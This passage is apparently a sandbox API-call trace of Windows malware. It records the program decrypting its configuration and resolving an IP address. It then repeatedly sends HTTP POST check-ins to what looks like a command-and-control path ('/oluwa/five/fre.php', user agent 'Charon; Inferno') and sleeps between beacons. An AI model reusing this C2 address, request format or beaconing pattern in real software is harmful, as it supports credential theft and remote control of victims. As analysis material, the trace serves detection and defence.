phProv=0x19fca8*=0x0) returned 1 [0183.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.722] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0183.731] GetProcessHeap () returned 0x6a0000 [0183.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b6c08 [0183.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.733] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b6c08, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0183.733] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.734] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0183.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.734] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0183.735] GetProcessHeap () returned 0x6a0000 [0183.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6c08 | out: hHeap=0x6a0000) returned 1 [0183.736] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.736] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0183.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.738] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0183.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.739] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0183.739] GetProcessHeap () returned 0x6a0000 [0183.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0183.740] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.744] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0183.745] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.745] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0183.746] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.747] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0183.748] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.748] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0183.748] GetProcessHeap () returned 0x6a0000 [0183.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0183.748] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0183.749] GetProcessHeap () returned 0x6a0000 [0183.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0183.749] GetProcessHeap () returned 0x6a0000 [0183.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0183.750] GetProcessHeap () returned 0x6a0000 [0183.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0183.751] GetProcessHeap () returned 0x6a0000 [0183.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0183.752] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.752] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0183.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.761] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0183.770] GetProcessHeap () returned 0x6a0000 [0183.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0183.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.771] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0183.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.772] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0183.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.773] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0183.773] GetProcessHeap () returned 0x6a0000 [0183.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0183.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.775] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0183.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.776] CryptDestroyKey (hKey=0x6ad060) returned 1 [0183.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.778] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0183.778] GetProcessHeap () returned 0x6a0000 [0183.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0183.779] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.779] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0183.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.780] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0183.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.782] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0183.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.783] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0183.783] GetProcessHeap () returned 0x6a0000 [0183.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0183.783] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9b18*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be850*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0183.783] GetProcessHeap () returned 0x6a0000 [0183.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaa0 [0183.783] socket (af=2, type=1, protocol=6) returned 0x41c [0183.784] connect (s=0x41c, name=0x6be850*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0183.808] FreeAddrInfoW (pAddrInfo=0x6b9b18*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be850*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0183.808] GetProcessHeap () returned 0x6a0000 [0183.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0183.808] GetProcessHeap () returned 0x6a0000 [0183.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0183.809] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0183.811] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0183.811] GetProcessHeap () returned 0x6a0000 [0183.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0183.811] GetProcessHeap () returned 0x6a0000 [0183.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0183.812] GetProcessHeap () returned 0x6a0000 [0183.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0183.812] GetProcessHeap () returned 0x6a0000 [0183.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0183.813] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0183.814] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0183.814] GetProcessHeap () returned 0x6a0000 [0183.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0183.814] GetProcessHeap () returned 0x6a0000 [0183.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0183.814] send (s=0x41c, buf=0x6bbd20*, len=242, flags=0) returned 242 [0183.815] send (s=0x41c, buf=0x6bb998*, len=159, flags=0) returned 159 [0183.815] GetProcessHeap () returned 0x6a0000 [0183.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0183.815] recv (in: s=0x41c, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0183.904] GetProcessHeap () returned 0x6a0000 [0183.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0183.905] GetProcessHeap () returned 0x6a0000 [0183.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0183.906] GetProcessHeap () returned 0x6a0000 [0183.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0183.906] GetProcessHeap () returned 0x6a0000 [0183.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0183.907] closesocket (s=0x41c) returned 0 [0183.907] GetProcessHeap () returned 0x6a0000 [0183.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaa0 | out: hHeap=0x6a0000) returned 1 [0183.907] GetProcessHeap () returned 0x6a0000 [0183.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0183.908] GetProcessHeap () returned 0x6a0000 [0183.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0183.908] GetProcessHeap () returned 0x6a0000 [0183.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0183.909] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x604) returned 0x41c [0183.911] Sleep (dwMilliseconds=0xea60) [0183.912] GetProcessHeap () returned 0x6a0000 [0183.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0183.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.914] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0183.921] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.921] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0183.962] GetProcessHeap () returned 0x6a0000 [0183.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0183.963] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.963] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0183.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.965] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0183.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.966] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0183.966] GetProcessHeap () returned 0x6a0000 [0183.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0183.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.968] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0183.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.969] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0183.977] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.977] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0183.977] GetProcessHeap () returned 0x6a0000 [0183.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0183.978] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.979] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0183.980] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.980] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0183.981] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.981] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0183.982] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.983] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0183.983] GetProcessHeap () returned 0x6a0000 [0183.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0183.983] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0183.984] GetProcessHeap () returned 0x6a0000 [0183.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0183.984] GetProcessHeap () returned 0x6a0000 [0183.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0183.985] GetProcessHeap () returned 0x6a0000 [0183.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0183.986] GetProcessHeap () returned 0x6a0000 [0183.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0183.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.988] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0183.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.995] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0184.002] GetProcessHeap () returned 0x6a0000 [0184.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0184.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.003] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0184.003] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.004] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0184.004] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.004] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0184.004] GetProcessHeap () returned 0x6a0000 [0184.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0184.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.006] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0184.007] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.007] CryptDestroyKey (hKey=0x6ad020) returned 1 [0184.007] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.008] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0184.008] GetProcessHeap () returned 0x6a0000 [0184.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0184.010] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.010] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0184.011] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.011] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0184.012] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.012] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0184.013] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.013] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0184.013] GetProcessHeap () returned 0x6a0000 [0184.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0184.013] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9d48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea00*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0184.013] GetProcessHeap () returned 0x6a0000 [0184.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0184.013] socket (af=2, type=1, protocol=6) returned 0x420 [0184.013] connect (s=0x420, name=0x6bea00*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0184.038] FreeAddrInfoW (pAddrInfo=0x6b9d48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea00*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0184.038] GetProcessHeap () returned 0x6a0000 [0184.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0184.039] GetProcessHeap () returned 0x6a0000 [0184.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0184.040] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0184.041] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0184.041] GetProcessHeap () returned 0x6a0000 [0184.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0184.041] GetProcessHeap () returned 0x6a0000 [0184.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0184.041] GetProcessHeap () returned 0x6a0000 [0184.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0184.042] GetProcessHeap () returned 0x6a0000 [0184.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0184.042] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0184.043] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0184.043] GetProcessHeap () returned 0x6a0000 [0184.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0184.043] GetProcessHeap () returned 0x6a0000 [0184.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0184.044] send (s=0x420, buf=0x6bbd20*, len=242, flags=0) returned 242 [0184.053] send (s=0x420, buf=0x6bb998*, len=159, flags=0) returned 159 [0184.063] GetProcessHeap () returned 0x6a0000 [0184.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0184.063] recv (in: s=0x420, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0184.150] GetProcessHeap () returned 0x6a0000 [0184.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0184.150] GetProcessHeap () returned 0x6a0000 [0184.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0184.150] GetProcessHeap () returned 0x6a0000 [0184.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0184.151] GetProcessHeap () returned 0x6a0000 [0184.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0184.152] closesocket (s=0x420) returned 0 [0184.152] GetProcessHeap () returned 0x6a0000 [0184.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0184.152] GetProcessHeap () returned 0x6a0000 [0184.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0184.153] GetProcessHeap () returned 0x6a0000 [0184.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0184.153] GetProcessHeap () returned 0x6a0000 [0184.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0184.153] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x10fc) returned 0x420 [0184.155] Sleep (dwMilliseconds=0xea60) [0184.157] GetProcessHeap () returned 0x6a0000 [0184.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0184.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.158] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0184.166] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.167] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0184.175] GetProcessHeap () returned 0x6a0000 [0184.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6bf550 [0184.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.177] CryptImportKey (in: hProv=0x6beb90, pbData=0x6bf550, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0184.177] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.178] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0184.178] LoadLibraryW 